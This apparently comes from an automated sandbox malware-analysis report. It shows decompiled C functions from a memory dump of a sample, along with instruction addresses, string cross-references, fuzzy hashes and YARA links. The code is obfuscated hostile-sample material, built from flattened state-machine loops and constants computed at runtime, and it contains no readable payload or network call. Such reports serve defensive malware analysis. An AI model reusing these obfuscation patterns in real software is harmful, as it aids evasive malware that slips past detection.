				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E002478A5(_t315, _t315, 0x10, _t315, 4);
							E00247787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E00247787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E002478A5(_t315, _t315, 0x10, _t315, 4);
								E00247787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E00258C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E00247787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}

0x00251be8
0x00251bf0
0x00251bf7
0x00251bfd
0x00251c04
0x00251c09
0x00251c10
0x00251c17
0x00251c23
0x00251c28
0x00251c2d
0x00251c34
0x00251c3e
0x00251c43
0x00251c48
0x00251c4f
0x00251c52
0x00251c59
0x00251c60
0x00251c67
0x00251c71
0x00251c76
0x00251c7b
0x00251c82
0x00251c89
0x00251c8d
0x00251c90
0x00251c97
0x00251c9e
0x00251ca5
0x00251cac
0x00251cb6
0x00251cbb
0x00251cc0
0x00251cc7
0x00251cce
0x00251cd5
0x00251cd9
0x00251cdd
0x00251ce4
0x00251cef
0x00251cf0
0x00251cf3
0x00251cfa
0x00251d01
0x00251d08
0x00251d0c
0x00251d13
0x00251d17
0x00251d1e
0x00251d25
0x00251d29
0x00251d30
0x00251d37
0x00251d3e
0x00251d4a
0x00251d4d
0x00251d54
0x00251d63
0x00251d66
0x00251d69
0x00251d70
0x00251d7e
0x00251d81
0x00251d88
0x00251d8f
0x00251d96
0x00251d9a
0x00251da1
0x00251da8
0x00251db3
0x00251db6
0x00251db9
0x00251dc4
0x00251dc7
0x00251dce
0x00251dd9
0x00251ddc
0x00251de6
0x00251de9
0x00251df0
0x00251df7
0x00251dfb
0x00251e02
0x00251e0d
0x00251e0e
0x00251e11
0x00251e18
0x00251e1f
0x00251e26
0x00251e32
0x00251e35
0x00251e3c
0x00251e43
0x00251e4a
0x00251e51
0x00251e58
0x00251e5f
0x00251e66
0x00251e6d
0x00251e71
0x00251e79
0x00251e7c
0x00251e83
0x00251e8a
0x00251e8e
0x00251e92
0x00251e99
0x00251ea0
0x00251ea7
0x00251eb2
0x00251eb5
0x00251ebc
0x00251ec3
0x00251eca
0x00251ed1
0x00251ed8
0x00251ee6
0x00251eeb
0x00251eee
0x00251ef5
0x00251ef6
0x00251ef6
0x00251f08
0x00251f99
0x00251fac
0x00251fb1
0x00251fc8
0x00251fcd
0x00251fd0
0x00251fd3
0x00251fda
0x00251fdb
0x00251fde
0x00000000
0x00251f0a
0x00251f10
0x00251f4e
0x00251f61
0x00251f66
0x00251f69
0x00251f6c
0x00251f73
0x00251f74
0x00251f77
0x00000000
0x00251f12
0x00251f18
0x00251f24
0x00251f29
0x00251f2c
0x00000000
0x00251f2c
0x00251f18
0x00251f10
0x00000000
0x00251f08
0x00251ffb
0x00252000
0x00252005
0x00252008
0x0025200d
0x00252010
0x00252012
0x00252012
0x00252024

Strings

5}X, xrefs: 00251CFA

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5}X
API String ID: 0-583016468
Opcode ID: 4c1769b2fc25b4559d81a8017bd6ec2d08264628a188b42135de96222fd5b1ae
Instruction ID: c4065f2b9dbc989722528489b852fa503e7342455a63b2f74aadb0000dc2471b
Opcode Fuzzy Hash: 4c1769b2fc25b4559d81a8017bd6ec2d08264628a188b42135de96222fd5b1ae
Instruction Fuzzy Hash: A5D12371D10319EBDB18CFE5C88A9DEBBB1FF44314F208019E512BA2A0D7B91A56CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002462A3, Relevance: 1.4, Strings: 1, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002462A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E0025889D(0x25c930, _v76, __eflags);
							_t182 =  *0x25ca2c; // 0x6d8300
							_t206 =  *0x25ca2c; // 0x6d8300
							E002429E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00252025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E0024C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E0024568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}

0x002462ac
0x002462b8
0x002462ba
0x002462bf
0x002462c2
0x002462c9
0x002462cd
0x002462d1
0x002462d8
0x002462e4
0x002462e9
0x002462ee
0x002462f5
0x002462fc
0x00246303
0x00246307
0x0024630b
0x00246312
0x00246319
0x0024631d
0x00246321
0x00246328
0x00246333
0x00246336
0x00246339
0x00246340
0x00246347
0x0024634e
0x00246355
0x0024635c
0x00246363
0x0024636a
0x00246371
0x00246378
0x0024637f
0x00246386
0x00246394
0x00246397
0x0024639e
0x002463a5
0x002463ac
0x002463b3
0x002463ba
0x002463be
0x002463c5
0x002463cc
0x002463d3
0x002463dd
0x002463e0
0x002463e3
0x002463ea
0x002463f1
0x002463f5
0x002463f9
0x00246400
0x00246407
0x00246412
0x00246419
0x0024641c
0x00246423
0x0024642a
0x00246431
0x00246435
0x0024643c
0x00246448
0x0024644f
0x00246456
0x0024645d
0x00246464
0x0024646b
0x00246472
0x00246479
0x0024647d
0x00246484
0x0024648f
0x00246492
0x00246496
0x0024649d
0x002464a4
0x002464a8
0x002464af
0x002464b6
0x002464b6
0x002464c4
0x002464f7
0x00246502
0x0024651c
0x00246530
0x0024653c
0x0024654c
0x00246551
0x00246554
0x00000000
0x002464c6
0x002464cc
0x002464d2
0x002464d3
0x002464eb
0x002464f0
0x002464f3
0x00000000
0x002464f3
0x002464cc
0x00000000
0x002464c4
0x0024655e
0x0024655f
0x0024656a
0x0024656c
0x0024656f
0x00246571
0x00246577
0x00246578
0x0024657f
0x00246583
0x00246585
0x00246588
0x0024658d
0x0024658d
0x0024658d
0x002465a1

Strings

I%p , xrefs: 00246443

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: I%p
API String ID: 0-3985577374
Opcode ID: 2c7638443a9c0c1e3d64a9c494bb24f8a54b54f54b002d4ed92aa167cc4fae21
Instruction ID: 40ad01a0e1e8b7280b3fb945df5c4b78b7146ea5e040b97be6bff2c796fa4a3f
Opcode Fuzzy Hash: 2c7638443a9c0c1e3d64a9c494bb24f8a54b54f54b002d4ed92aa167cc4fae21
Instruction Fuzzy Hash: F08137B1D0021DABDF58CFE5D94A5DEFBB1FB44318F208059E511B62A0D7B80A09CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00250D33, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00250D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00258C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E002478A5(_t158, _t158, _v16, _t158, _v8);
				E00247787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}

0x00250d3b
0x00250d3e
0x00250d40
0x00250d43
0x00250d47
0x00250d48
0x00250d4d
0x00250d57
0x00250d5d
0x00250d64
0x00250d6b
0x00250d72
0x00250d7f
0x00250d82
0x00250d85
0x00250d8c
0x00250d93
0x00250da1
0x00250da4
0x00250dab
0x00250db6
0x00250db7
0x00250dba
0x00250dc1
0x00250dc8
0x00250dcf
0x00250dd3
0x00250dda
0x00250de1
0x00250de5
0x00250dec
0x00250df0
0x00250df7
0x00250e05
0x00250e08
0x00250e0f
0x00250e1b
0x00250e1e
0x00250e25
0x00250e2c
0x00250e30
0x00250e37
0x00250e3e
0x00250e45
0x00250e4c
0x00250e53
0x00250e5e
0x00250e61
0x00250e73
0x00250e78
0x00250e7f
0x00250e86
0x00250e8d
0x00250e94
0x00250e9b
0x00250ea7
0x00250eaa
0x00250eaf
0x00250ebb
0x00250ebe
0x00250ec1
0x00250ee5
0x00250ef8
0x00250f02
0x00250f0b

Strings

D}0, xrefs: 00250DC1

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: D}0
API String ID: 0-882559769
Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction ID: 62a8c1827b629aa41a560ca34caf653983dc59df2835fb2d56f630d82789c00d
Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction Fuzzy Hash: 6351F3B2D0120AEBDF09CFA5C94A8EEBBB2FB44314F108199E111B6250D7B95B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0025340A, Relevance: 1.4, Strings: 1, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0025340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E0024B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E002550F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E00258F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}

0x00253411
0x00253418
0x0025341a
0x0025341b
0x00253422
0x00253423
0x00253424
0x00253429
0x00253431
0x00253433
0x0025343b
0x0025343e
0x00253444
0x0025344c
0x00253451
0x00253456
0x0025345e
0x00253466
0x0025346e
0x00253476
0x0025347b
0x0025348a
0x0025348b
0x0025348f
0x00253497
0x002534a4
0x002534a8
0x002534b0
0x002534b8
0x002534c0
0x002534c8
0x002534d0
0x002534d8
0x002534e0
0x002534e8
0x002534f0
0x00253503
0x00253507
0x0025350c
0x00253514
0x0025351c
0x00253524
0x00253529
0x00253531
0x00253539
0x00253541
0x00253549
0x00253551
0x00253559
0x0025355e
0x00253566
0x0025356e
0x0025356e
0x00253578
0x00253600
0x00253602
0x0025357a
0x00253580
0x002535a2
0x002535a7
0x002535aa
0x00000000
0x00253582
0x00253588
0x00000000
0x0025358a
0x0025358a
0x00000000
0x0025358a
0x00253588
0x00253580
0x00253606
0x0025360e
0x0025360e
0x002535c6
0x002535cb
0x002535ce
0x002535d0
0x002535d6
0x00000000
0x002535d2
0x002535d2
0x00000000
0x002535d2
0x00000000
0x002535db
0x002535db
0x002535db
0x00000000

Strings

@d, xrefs: 00253549

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @d
API String ID: 0-4219467963
Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction ID: 0e586e56164d2aadcc731a171f42eb7970a348c87ea7406acbc7406152a56118
Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction Fuzzy Hash: 2C5178711083429BD318CF21C84A81FFBE1BBD8788F505A2DF99652160D7B5CB198F8B

Uniqueness

Uniqueness Score: -1.00%

Function 00253FE7, Relevance: 1.4, Strings: 1, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00253FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E00258F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E002550F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E0024B055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}

0x00253fee
0x00253ff5
0x00253ff7
0x00253ffe
0x00253fff
0x00254000
0x00254005
0x0025400d
0x00254016
0x00254018
0x00254024
0x00254029
0x0025402f
0x00254037
0x0025403f
0x00254047
0x0025404f
0x00254057
0x0025405f
0x0025406c
0x0025406d
0x00254071
0x00254079
0x00254081
0x00254089
0x00254091
0x00254099
0x002540a1
0x002540a9
0x002540ae
0x002540b6
0x002540be
0x002540c6
0x002540ce
0x002540d6
0x002540db
0x002540e3
0x002540eb
0x002540fb
0x002540ff
0x00254107
0x00254114
0x00254118
0x00254120
0x00254120
0x0025412a
0x002541b1
0x002541b3
0x0025412c
0x0025412e
0x00254153
0x00254158
0x0025415b
0x00000000
0x00254130
0x00254136
0x00000000
0x00254138
0x00254138
0x00000000
0x00254138
0x00254136
0x0025412e
0x002541b7
0x002541bf
0x002541bf
0x00254177
0x00254179
0x0025417f
0x00000000
0x0025417b
0x0025417b
0x00000000
0x0025417b
0x00000000
0x00254184
0x00254184
0x00254184
0x00000000

Strings

tx, xrefs: 0025402F

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: tx
